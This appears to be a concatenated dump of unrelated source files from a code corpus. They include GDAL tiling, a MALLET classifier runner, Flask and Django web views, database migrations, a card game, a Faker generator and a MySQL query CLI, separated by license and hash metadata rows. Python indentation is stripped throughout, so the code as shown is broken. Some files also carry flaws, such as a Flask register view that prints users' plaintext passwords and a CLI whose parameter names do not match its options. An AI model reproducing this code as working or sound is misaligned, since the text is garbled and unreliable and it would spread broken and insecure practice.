gdal2tiles = GDAL2Tiles(input_file, output_folder, options)
gdal2tiles.open_input()
gdal2tiles.generate_metadata()
tile_job_info, tile_details = gdal2tiles.generate_base_tiles()
return tile_job_info, tile_details
class ProgressBar(object):
def __init__(self, total_items):
self.total_items = total_items
self.nb_items_done = 0
self.current_progress = 0
self.STEP = 2.5
def start(self):
sys.stdout.write("0")
def log_progress(self, nb_items=1):
self.nb_items_done += nb_items
progress = float(self.nb_items_done) / self.total_items * 100
if progress >= self.current_progress + self.STEP:
done = False
while not done:
if self.current_progress + self.STEP <= progress:
self.current_progress += self.STEP
if self.current_progress % 10 == 0:
sys.stdout.write(str(int(self.current_progress)))
if self.current_progress == 100:
sys.stdout.write("\n")
else:
sys.stdout.write(".")
else:
done = True
sys.stdout.flush()
def get_tile_swne(tile_job_info, options):
if options.profile == 'mercator':
mercator = GlobalMercator()
tile_swne = mercator.TileLatLonBounds
elif options.profile == 'geodetic':
geodetic = GlobalGeodetic(options.tmscompatible)
tile_swne = geodetic.TileLatLonBounds
elif options.profile == 'raster':
srs4326 = osr.SpatialReference()
srs4326.ImportFromEPSG(4326)
srs4326.SetAxisMappingStrategy(osr.OAMS_TRADITIONAL_GIS_ORDER)
if tile_job_info.kml and tile_job_info.in_srs_wkt:
in_srs = osr.SpatialReference()
in_srs.SetAxisMappingStrategy(osr.OAMS_TRADITIONAL_GIS_ORDER)
in_srs.ImportFromWkt(tile_job_info.in_srs_wkt)
ct = osr.CoordinateTransformation(in_srs, srs4326)
def rastertileswne(x, y, z):
pixelsizex = (2 ** (tile_job_info.tmaxz - z) * tile_job_info.out_geo_trans[1])
west = tile_job_info.out_geo_trans[0] + x * tile_job_info.tile_size * pixelsizex
east = west + tile_job_info.tile_size * pixelsizex
if options.xyz:
north = tile_job_info.out_geo_trans[3] - y * tile_job_info.tile_size * pixelsizex
south = north - tile_job_info.tile_size * pixelsizex
else:
south = tile_job_info.ominy + y * tile_job_info.tile_size * pixelsizex
north = south + tile_job_info.tile_size * pixelsizex
if not tile_job_info.is_epsg_4326:
# Transformation to EPSG:4326 (WGS84 datum)
west, south = ct.TransformPoint(west, south)[:2]
east, north = ct.TransformPoint(east, north)[:2]
return south, west, north, east
tile_swne = rastertileswne
else:
tile_swne = lambda x, y, z: (0, 0, 0, 0) # noqa
else:
tile_swne = None
return tile_swne
def single_threaded_tiling(input_file, output_folder, options):
"""
Keep a single threaded version that stays clear of multiprocessing, for platforms that would not
support it
"""
if options.verbose:
print("Begin tiles details calc")
conf, tile_details = worker_tile_details(input_file, output_folder, options)
if options.verbose:
print("Tiles details calc complete.")
if not options.verbose and not options.quiet:
progress_bar = ProgressBar(len(tile_details))
progress_bar.start()
for tile_detail in tile_details:
create_base_tile(conf, tile_detail)
if not options.verbose and not options.quiet:
progress_bar.log_progress()
if getattr(threadLocal, 'cached_ds', None):
del threadLocal.cached_ds
create_overview_tiles(conf, output_folder, options)
shutil.rmtree(os.path.dirname(conf.src_file))
def multi_threaded_tiling(input_file, output_folder, options):
nb_processes = options.nb_processes or 1
# Make sure that all processes do not consume more than `gdal.GetCacheMax()`
gdal_cache_max = gdal.GetCacheMax()
gdal_cache_max_per_process = max(1024 * 1024, math.floor(gdal_cache_max / nb_processes))
set_cache_max(gdal_cache_max_per_process)
pool = Pool(processes=nb_processes)
if options.verbose:
print("Begin tiles details calc")
conf, tile_details = worker_tile_details(input_file, output_folder, options)
if options.verbose:
print("Tiles details calc complete.")
if not options.verbose and not options.quiet:
progress_bar = ProgressBar(len(tile_details))
progress_bar.start()
# TODO: gbataille - check the confs for which each element is an array... one useless level?
# TODO: gbataille - assign an ID to each job for print in verbose mode "ReadRaster Extent ..."
for _ in pool.imap_unordered(partial(create_base_tile, conf), tile_details, chunksize=128):
if not options.verbose and not options.quiet:
progress_bar.log_progress()
pool.close()
pool.join() # Jobs finished
# Set the maximum cache back to the original value
set_cache_max(gdal_cache_max)
create_overview_tiles(conf, output_folder, options)
shutil.rmtree(os.path.dirname(conf.src_file))
def main(argv):
# TODO: gbataille - use mkdtemp to work in a temp directory
# TODO: gbataille - debug intermediate tiles.vrt not produced anymore?
# TODO: gbataille - Refactor generate overview tiles to not depend on self variables
# For multiprocessing, we need to propagate the configuration options to
# the environment, so that forked processes can inherit them.
for i in range(len(argv)):
if argv[i] == '--config' and i + 2 < len(argv):
os.environ[argv[i+1]] = argv[i+2]
argv = gdal.GeneralCmdLineProcessor(argv)
if argv is None:
return
input_file, output_folder, options = process_args(argv[1:])
nb_processes = options.nb_processes or 1
if nb_processes == 1:
single_threaded_tiling(input_file, output_folder, options)
else:
multi_threaded_tiling(input_file, output_folder, options)
# vim: set tabstop=4 shiftwidth=4 expandtab:
if __name__ == '__main__':
sys.exit(main(sys.argv))
| gpl-3.0 | 3,414,157,871,314,064,000 | 40.622147 | 407 | 0.542697 | false | 3.807212 | false | false | false |
mespinozas/si | t3/t3loader.py | 1 | 1118 | import threading
import logging
import time
import os
logging.basicConfig( level=logging.DEBUG, format='[%(levelname)s] - %(threadName)-10s : %(message)s')
def worker(x):
logging.debug('Lanzado')
importer = 'bin/mallet import-svmlight --input archivoEntrenamiento%s.txt --output training%s.mallet' % (x,x)
#print importer
os.system(importer)
classifiers = ['NaiveBayes', 'DecisionTree','MaxEntL1','MaxEnt', 'BalancedWinnow', 'Winnow']
for j in range(len(classifiers)):
trainer= 'bin/mallet train-classifier --input training%s.mallet --output-classifier output%s_%s.classifier --trainer %s' % (x,x,classifiers[j],classifiers[j])
#print trainer
os.system(trainer)
classify = 'bin/mallet classify-file --input archivo%s.txt --output output%s_%s.txt --classifier output%s_%s.classifier' % (x,x,classifiers[j],x,classifiers[j])
#print classify
os.system(classify)
logging.debug('Deteniendo')
return
threads = list()
for i in range(1,11):
t = threading.Thread(target=worker, args=(i,))
threads.append(t)
t.start()
| gpl-2.0 | -8,920,960,298,645,710,000 | 30.942857 | 168 | 0.669946 | false | 3.259475 | false | false | false |
AndrewGoldstein/grasshopper | grasshopper/public/views.py | 1 | 2732 | # -*- coding: utf-8 -*-
"""Public section, including homepage and signup."""
from flask import Blueprint, flash, redirect, render_template, request, url_for, g
from flask_login import login_required, login_user, logout_user
from grasshopper.extensions import login_manager
from grasshopper.public.forms import LoginForm
from grasshopper.user.forms import RegisterForm
from grasshopper.user.models import User
from grasshopper.utils import flash_errors
blueprint = Blueprint('public', __name__, static_folder='../static')
@login_manager.user_loader
def load_user(user_id):
"""Load user by ID."""
return User.get_by_id(int(user_id))
@blueprint.route('/', methods=['GET', 'POST'])
def home():
"""Home page."""
form = LoginForm(request.form)
# Handle logging in
if request.method == 'POST':
if form.validate_on_submit():
login_user(form.user)
with open("foo.py", "w") as f:
f.write("X=" + str(form.user.id))
#flash('You are logged in.', 'success')
#redirect_url = request.args.get('next') or url_for('user.jumbo')
return redirect(url_for('user.jumbo'))
else:
flash_errors(form)
return render_template('users/testing2.html', form=form)
@blueprint.route('/logout/')
@login_required
def logout():
"""Logout."""
logout_user()
#flash('You are logged out.', 'info')
return redirect(url_for('public.home'))
@blueprint.route('/register/', methods=['GET', 'POST'])
def register():
"""Register new user."""
form = RegisterForm(request.form, csrf_enabled=False)
if form.validate_on_submit():
User.create(username=form.username.data, email=form.email.data, password=form.password.data, active=True)
print form.username.data
print form.email.data
print form.password.data
flash('Thank you for registering. You can now log in.', 'success')
return redirect(url_for('public.home'))
else:
flash_errors(form)
return render_template('public/register.html', form=form)
@blueprint.route('/about/')
def about():
"""About page."""
form = LoginForm(request.form)
return render_template('public/about.html', form=form)
"""
@blueprint.route('/db')
def dbtest():
try:
#User.create(username="aaaa", email="[email protected]", password="aaaa", active=True)
print "hey"
User.create(username='John1', email='[email protected]', password="aaaa1", active=True)
#db.session.add(user)
#db.session.commit()
print "success"
except Exception as e:
f = open('/tmp/error.log', 'w')
f.write(e.message)
f.close()
return 'done'
return 'done2'
""" | bsd-3-clause | -4,215,876,279,390,760,000 | 30.77907 | 113 | 0.635798 | false | 3.571242 | false | false | false |
nikhila05/MicroSite | micro_blog/migrations/0001_initial.py | 1 | 4172 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import datetime
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='BlogComments',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=255)),
('email', models.EmailField(max_length=255)),
('message', models.TextField()),
('created', models.DateTimeField(auto_now_add=True)),
('status', models.CharField(default=b'off', max_length=3, blank=True)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(unique=True, max_length=20)),
('slug', models.CharField(unique=True, max_length=20)),
('description', models.CharField(max_length=500)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Image_File',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('upload', models.FileField(upload_to=b'static/uploads/%Y/%m/%d/')),
('date_created', models.DateTimeField(default=datetime.datetime.now)),
('is_image', models.BooleanField(default=True)),
('thumbnail', models.FileField(null=True, upload_to=b'static/uploads/%Y/%m/%d/', blank=True)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('title', models.CharField(max_length=100)),
('slug', models.SlugField(max_length=100)),
('created_on', models.DateTimeField(auto_now_add=True)),
('updated_on', models.DateField(auto_now=True)),
('content', models.TextField()),
('featured_image', models.CharField(max_length=400, null=True, blank=True)),
('featured_post', models.CharField(default=b'off', max_length=4, blank=True)),
('status', models.CharField(blank=True, max_length=2, choices=[(b'D', b'Draft'), (b'P', b'Published'), (b'T', b'Rejected')])),
('category', models.ForeignKey(to='micro_blog.Category')),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Tags',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(unique=True, max_length=20)),
('slug', models.CharField(unique=True, max_length=20)),
],
options={
},
bases=(models.Model,),
),
migrations.AddField(
model_name='post',
name='tags',
field=models.ManyToManyField(to='micro_blog.Tags', null=True, blank=True),
preserve_default=True,
),
migrations.AddField(
model_name='post',
name='user',
field=models.ForeignKey(to=settings.AUTH_USER_MODEL),
preserve_default=True,
),
migrations.AddField(
model_name='blogcomments',
name='post',
field=models.ForeignKey(blank=True, to='micro_blog.Post', null=True),
preserve_default=True,
),
]
| gpl-2.0 | -10,623,089,563,571,604 | 39.901961 | 142 | 0.529003 | false | 4.386961 | false | false | false |
alphagov/notifications-api | migrations/versions/0083_add_perm_types_and_svc_perm.py | 1 | 2344 | """empty message
Revision ID: 0083_add_perm_types_and_svc_perm
Revises: 0082_add_go_live_template
Create Date: 2017-05-12 11:29:32.664811
"""
# revision identifiers, used by Alembic.
revision = '0083_add_perm_types_and_svc_perm'
down_revision = '0082_add_go_live_template'
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
def upgrade():
### commands auto generated by Alembic - please adjust! ###
service_permission_types=op.create_table('service_permission_types',
sa.Column('name', sa.String(length=255), nullable=False),
sa.PrimaryKeyConstraint('name'))
op.bulk_insert(service_permission_types,
[
{'name': x} for x in {
'letter',
'email',
'sms',
'international_sms',
'incoming_sms'
}
])
op.create_table('service_permissions',
sa.Column('service_id', postgresql.UUID(as_uuid=True), nullable=False),
sa.Column('permission', sa.String(length=255), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.ForeignKeyConstraint(['permission'], ['service_permission_types.name'], ),
sa.ForeignKeyConstraint(['service_id'], ['services.id'], ),
sa.PrimaryKeyConstraint('service_id', 'permission'))
op.create_index(op.f('ix_service_permissions_permission'), 'service_permissions', ['permission'], unique=False)
op.create_index(op.f('ix_service_permissions_service_id'), 'service_permissions', ['service_id'], unique=False)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_index(op.f('ix_service_permissions_service_id'), table_name='service_permissions')
op.drop_index(op.f('ix_service_permissions_permission'), table_name='service_permissions')
op.drop_table('service_permissions')
op.drop_table('service_permission_types')
# ### end Alembic commands ###
| mit | -4,852,084,235,956,907,000 | 43.226415 | 115 | 0.579352 | false | 4.193202 | false | false | false |
lidaobing/itcc | itcc/ccs2/solvent_caflisch.py | 1 | 3718 | import pkg_resources
import math
from itcc import tools
ff_cache = {}
caflisch_dat = None
r_probe = 1.4
pij_bonded = 0.8875
pij_nonbonded = 0.3516
class Caflisch(object):
def __init__(self, data):
self.data = data
assert len(self.data) == 5
def _r_min(self):
return self.data[1]
def _r(self):
return self.data[2]
def _p(self):
return self.data[3]
def _sigma(self):
return self.data[4]
r_min = property(_r_min)
r = property(_r)
p = property(_p)
sigma = property(_sigma)
def init_caflisch():
global caflisch_dat
if caflisch_dat is not None: return
caflisch_dat = read_caflisch(
pkg_resources.resource_stream(__name__, 'caflisch.dat'))
def init_ff(forcefield):
if forcefield in ff_cache:
return
init_caflisch()
ff_cache[forcefield] = {}
res = ff_cache[forcefield]
ifname = forcefield + "-caflisch.dat"
ifile = pkg_resources.resource_stream(__name__, ifname)
for line in tools.conffile(ifile):
ff_type, cal_type = (int(x) for x in line.split())
if ff_type in res:
raise RuntimeError("duplicate type")
if cal_type != 0:
res[ff_type] = caflisch_dat[cal_type]
else:
res[ff_type] = None
def solvent_caflisch(mol, forcefield, debug=0):
if mol.connect is None:
raise RuntimeError("can't deal with mol without connective information")
init_ff(forcefield)
ff = ff_cache[forcefield]
data = []
for i in range(len(mol)):
if mol.atoms[i].type not in ff:
raise RuntimeError(
"no corresponding caflisch type for type %i of %s"
% (mol.atoms[i].type, forcefield))
if ff[mol.atoms[i].type] is not None:
data.append((ff[mol.atoms[i].type], mol.coords[i], i))
areas = []
for i in range(len(data)):
ri = data[i][0].r
area = 1
S = 4 * math.pi * (ri + r_probe) * (ri + r_probe)
for j in range(len(data)):
if j == i: continue
rj = data[j][0].r
rijsq = tools.dissq(data[i][1], data[j][1])
max_r = data[i][0].r + data[j][0].r + r_probe * 2
if rijsq >= max_r * max_r:
continue
rij = math.sqrt(rijsq)
bij = math.pi * (ri + r_probe) * (max_r - rij) \
* (1 + (rj - ri) / rij)
bonded = mol.is_connect(data[i][2], data[j][2])
if bonded:
pij = pij_bonded
else:
pij = pij_nonbonded
area *= 1 - data[i][0].p * pij * bij / S
areas.append(area * S)
if debug >= 1:
for i in range(len(data)):
print data[i][2]+1, areas[i]
return sum(areas[i] * data[i][0].sigma for i in range(len(data)))
def read_caflisch(ifile):
formats = (int, str, float, float, float, float)
result = {}
for line in ifile:
line = line.strip()
if not line: continue
if line[0] == '#': continue
words = line.split()
assert len(words) == 6
words = [format(x) for format,x in zip(formats, words)]
assert words[0] not in result, "duplicates type in input file"
result[words[0]] = Caflisch(tuple(words[1:]))
return result
def main():
import sys
if len(sys.argv) != 3:
import os.path
sys.stderr.write('Usage: %s molname forcefield\n'
% os.path.basename(sys.argv[0]))
sys.exit(1)
from itcc.molecule import read
mol = read.readxyz(file(sys.argv[1]))
print solvent_caflisch(mol, sys.argv[2], 1)
if __name__ == '__main__':
main()
| gpl-3.0 | -5,666,795,548,658,434,000 | 26.746269 | 80 | 0.537924 | false | 3.191416 | false | false | false |
anaoaktree/vcgen | vcgen/test.py | 1 | 1786 | # Copyright (c) 2011, Jay Conrod.
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of Jay Conrod nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL JAY CONROD BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import sys
import unittest
if __name__ == '__main__':
test_names = ['test_lexer', 'test_combinators', 'test_imp_parser', 'test_eval']
suite = unittest.defaultTestLoader.loadTestsFromNames(test_names)
result = unittest.TextTestRunner().run(suite)
| mit | -2,567,668,676,885,615,600 | 54.8125 | 83 | 0.758679 | false | 4.544529 | true | false | false |
Yubico/yubiadmin-dpkg | yubiadmin/config.py | 1 | 2301 | # Copyright (c) 2013 Yubico AB
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or
# without modification, are permitted provided that the following
# conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import sys
import os
import imp
import errno
from yubiadmin import default_settings
__all__ = [
'settings'
]
SETTINGS_FILE = os.getenv('YUBIADMIN_SETTINGS',
'/etc/yubico/admin/yubiadmin.conf')
VALUES = {
#Web interface
'USERNAME': 'user',
'PASSWORD': 'pass',
'INTERFACE': 'iface',
'PORT': 'port'
}
def parse(conf, settings={}):
for confkey, settingskey in VALUES.items():
if hasattr(conf, confkey):
settings[settingskey] = getattr(conf, confkey)
return settings
settings = parse(default_settings)
dont_write_bytecode = sys.dont_write_bytecode
try:
sys.dont_write_bytecode = True
user_settings = imp.load_source('user_settings', SETTINGS_FILE)
settings = parse(user_settings, settings)
except IOError, e:
if not e.errno in [errno.ENOENT, errno.EACCES]:
raise e
finally:
sys.dont_write_bytecode = dont_write_bytecode
| bsd-2-clause | -259,948,468,104,190,900 | 32.838235 | 71 | 0.720991 | false | 4.065371 | false | false | false |
jdelgad/IRefuse | irefuse/irefuse.py | 1 | 6388 | # -*- encoding: UTF-8 -*-
"""
'I Refuse' web application.
Copyright (C) 2017 Jacob Delgado
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import json
import logging
import random
from typing import Callable, List
from irefuse.player import Players, Player
logger = logging.getLogger()
class IRefuse(object):
"""The game logic behind I Refuse."""
USER_PASSES = 1
USER_TAKES_CARD = 2
MIN_PLAYERS = 3
MAX_PLAYERS = 5
NUMBER_OF_ROUNDS = 24
MIN_CARD = 3
MAX_CARD = 36
def __init__(self):
"""Construct 'I Refuse' game object."""
self.cards = []
self.players = None
def setup(self, input_func: Callable[[], str]) -> None:
"""
Set up the card game.
:param input_func: The function to use to prompt the user with.
:return: None
"""
logger.debug("Setting up I Refuse")
self.cards = self.setup_cards()
self.players = self.setup_players(input_func)
logger.info("Game created with {} players".format(len(self.players)))
logger.debug("Cards to be used in game: {}".format(self.cards))
@staticmethod
def setup_players(input_func: Callable[[], str]) -> Players:
"""
Set up the number of players. Must be between 3-5.
:param input_func: Used for mocking input()
:return: A list of game.player.Player objects
"""
print("Enter the number of players [3-5]: ")
number_of_people_playing = int(input_func())
if number_of_people_playing < IRefuse.MIN_PLAYERS or \
number_of_people_playing > IRefuse.MAX_PLAYERS:
logger.error("Invalid number of players specified: {}"
.format(number_of_people_playing))
raise AssertionError("invalid number of players")
return Players(number_of_people_playing)
@staticmethod
def setup_cards() -> List[int]:
""":return: A list of randomized 24 cards ranging from 3-35."""
return random.sample(range(IRefuse.MIN_CARD, IRefuse.MAX_CARD),
IRefuse.NUMBER_OF_ROUNDS)
def determine_winner(self) -> List[Player]:
"""
Calculate who won. Ties can occur.
Creates a dictionary of point values to list of players with that
value. Returns the players with the lowest point value.
:return: The list of winners.
"""
player_totals = {}
for player in self.players:
if player.calculate_points() in player_totals:
player_totals[player.calculate_points()].append(player)
else:
player_totals[player.calculate_points()] = [player]
logger.info("Final results: {}".format(self.players))
sorted_totals = sorted(player_totals.keys())
return player_totals[sorted_totals[0]]
def play(self, input_func: Callable[[], str]):
"""
Coordinate how the game is played.
:param input_func: Input function to prompt the user.
:return: The list of winners after a game has been completed.
"""
max_flips = len(self.cards)
player = self.players.next_player()
for _ in range(max_flips):
card = self.flip_card()
tokens = 0
action = self.prompt_for_action(card, tokens, input_func, player)
logger.debug("Available card: {}".format(card))
while action == IRefuse.USER_PASSES:
logger.debug("{} passed on {} with {} tokens remaining"
.format(player, card, player.tokens))
tokens += 1
player.passes()
player = self.players.next_player(player)
action = self.prompt_for_action(card, tokens, input_func,
player)
player.take_card(card, tokens)
logger.debug("{} took {} and now has {} tokens".
format(player, card, player.tokens))
logger.debug("No more actions")
# TODO: command or query, but not both
return self.determine_winner()
@staticmethod
def prompt_for_action(card: int,
tokens: int,
input_func: Callable[[], str],
current_player: Player):
"""
Prompt the user for action. Return enum for user selection.
:param card: The card currently face up.
:param tokens: The amount of tokens on the face up card.
:param input_func: Prompt for user input.
:param current_player: The player whose action it is.
:return: The user selection (enum integer).
"""
# TODO: command or query, but not both
if not current_player.can_pass():
return IRefuse.USER_TAKES_CARD
action = 0
while not (action == IRefuse.USER_PASSES or
action == IRefuse.USER_TAKES_CARD):
print("\n{} it is your turn".format(current_player))
print("Available card: {}, Number of tokens: {}"
.format(card, tokens))
print("What action do you wish to perform: ")
print("{}. Pass".format(IRefuse.USER_PASSES))
print("{}. Take card".format(IRefuse.USER_TAKES_CARD))
print("------------")
print("Selection: ")
action = int(input_func())
return action
def flip_card(self) -> int:
"""
Flip the top card on the deck.
:return: The newest card to be face up.
"""
return self.cards.pop()
def serialize(self) -> str:
"""Serialize class to json string."""
return json.dumps(self, default=lambda o: o.__dict__, sort_keys=True)
| agpl-3.0 | -3,449,111,402,710,158,300 | 35.090395 | 77 | 0.588134 | false | 4.150747 | false | false | false |
flyingSprite/spinelle | task_inventory/order_1_to_30/order_16_use_faker.py | 1 | 2553 |
""" Order 16: Use faker in python.
Generate lots of kinds data with Faker
* User information
"""
from faker import Faker, Factory
class FakerGenerator(object):
"""Generate different data by this class."""
fake = None
def __init__(self, language=None):
if language:
self.fake = Factory.create(language)
else:
self.fake = Faker()
def gen_user_info(self):
user = User()
user.name = self.fake.name()
user.address = self.fake.address()
return user
def get_full_values(self):
full_values = FullValues()
full_values.address = self.fake.address()
# full_values.barcode = self.fake.barcode()
full_values.color = self.fake.safe_hex_color()
full_values.company = self.fake.company()
full_values.credit_card = self.fake.credit_card_number()
full_values.currency = self.fake.currency_code()
full_values.date_time = self.fake.date_time()
full_values.file = self.fake.file_name()
full_values.internet = self.fake.company_email()
full_values.job = self.fake.job()
full_values.lorem = self.fake.text(max_nb_chars=200)
full_values.misc = self.fake.password()
full_values.person = self.fake.name_female()
full_values.phone_number = self.fake.phone_number()
full_values.profile = self.fake.profile()
# full_values.python = self.fake.python()
full_values.ssn = self.fake.ssn()
full_values.user_agent = self.fake.user_agent()
return full_values
class FullValues(object):
address = None
barcode = None
color = None
company = None
credit_card = None
currency = None
date_time = None
file = None
internet = None
job = None
lorem = None
misc = None
person = None
phone_number = None
profile = None
python = None
ssn = None
user_agent = None
def __str__(self):
"""Get this object instance string values."""
return 'FullValues = [%s]' % ', '.join(['%s: %s' % item for item in self.__dict__.items()])
class User(object):
name = ''
address = ''
def __str__(self):
"""Get this object instance string values."""
return 'User = [%s]' % ', '.join(['%s: %s' % item for item in self.__dict__.items()])
# import logging
# gen = FakerGenerator(language='zh_CN')
# print(gen.gen_user_info().__str__())
# logging.info(gen.gen_user_info().__str__())
#
# full = gen.get_full_values()
# print(full.__str__())
| mit | 3,729,536,303,053,445,000 | 27.685393 | 99 | 0.596553 | false | 3.62642 | false | false | false |
Victory/realpython-tdd | contacts/user_contacts/views.py | 1 | 1864 | from django.shortcuts import (
render,
render_to_response)
from django.template import RequestContext
from django.http import HttpResponseRedirect, HttpResponse
from django.views.generic import DetailView
from django.core.exceptions import ValidationError
from django.views.decorators.http import require_http_methods
from user_contacts.models import (
Phone,
Person)
from user_contacts.new_contact_form import ContactForm
def home(request):
return render_to_response('home.html')
class DetailContactView(DetailView):
model = Person
template_name = 'contact.html'
@require_http_methods(["POST"])
def validate(request):
post = request.POST
field_name = post['field_name']
field_value = post['field_value']
data_for_form = {}
data_for_form[field_name] = field_value
form = ContactForm(data_for_form)
field = form.fields[field_name]
data = field.widget.value_from_datadict(
form.data, form.files, form.add_prefix(field_name))
try:
cleaned_data = field.clean(data)
result = "valid"
except ValidationError, e:
result = '\n'.join(e.messages)
data = '{"result":"' + result + '"}'
return HttpResponse(data, content_type="text/json")
def all_contacts(request):
contacts = Phone.objects.all()
return render_to_response('all.html', {'contacts': contacts})
def add_contact(request):
person_form = ContactForm()
return render(
request,
'add.html',
{'person_form': person_form},
context_instance=RequestContext(request))
def create(request):
form = ContactForm(request.POST)
if form.is_valid():
form.save()
return HttpResponseRedirect('all/')
return render(
request,
'add.html',
{'person_form': form},
context_instance=RequestContext(request))
| mit | 4,318,323,745,429,808,600 | 24.534247 | 65 | 0.670601 | false | 3.899582 | false | false | false |
bjarnagin/manyquery | manyquery/cli.py | 1 | 1598 | import click
import csv
from manyquery.connection import Connection, MultiConnection
@click.command()
@click.option('--host', '-h', default=['ict.croptrak.com'], multiple=True,
help='Hostname. Repeatable.')
@click.option('--user', '-u', help='MySQL username')
@click.option('--password', '-p', prompt=True, hide_input=True,
help='MySQL password')
@click.option('--database', '-d', multiple=True,
help='Databases to execute query on. Default: all. Repeatable.')
@click.option('--all-hosts', help='Executes a query on all hostnames. ' \
'Not compatible with --databases option.', is_flag=True)
@click.argument('infile', type=click.File('rb'))
@click.argument('outfile')
def cli(host, user, password, databases, all_hosts, infile, outfile):
if databases and len(host) > 1:
click.echo('--databases option only available when used with single host')
return
if all_hosts:
conn = MultiConnection(user, password)
elif len(host) > 1:
conn = MultiConnection(user, password, host=host)
else:
conn = Connection(host[0], user, password)
if databases:
conn.select_dbs(databases)
query = ''
while True:
chunk = infile.read(1024).decode('utf-8')
if not chunk:
break
query = query + chunk
query = [query.replace(char, ' ') for char in ['\n', '\t']]
with open(outfile, 'w') as f:
writer = csv.writer(f)
for row in conn.execute(query, include_fields=True):
writer.writerow(row) | mit | -4,797,792,615,372,584,000 | 34.533333 | 82 | 0.610138 | false | 3.850602 | false | false | false |
tensorflow/probability | tensorflow_probability/python/distributions/blockwise.py | 1 | 15570 | # Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""The Blockwise distribution."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import tensorflow.compat.v2 as tf
from tensorflow_probability.python.distributions import distribution as distribution_lib
from tensorflow_probability.python.distributions import joint_distribution_sequential
from tensorflow_probability.python.distributions import kullback_leibler
from tensorflow_probability.python.internal import assert_util
from tensorflow_probability.python.internal import dtype_util
from tensorflow_probability.python.internal import parameter_properties
from tensorflow_probability.python.internal import prefer_static as ps
from tensorflow_probability.python.internal import reparameterization
from tensorflow_probability.python.internal import tensorshape_util
def _is_iterable(x):
try:
_ = iter(x)
except TypeError:
return False
return True
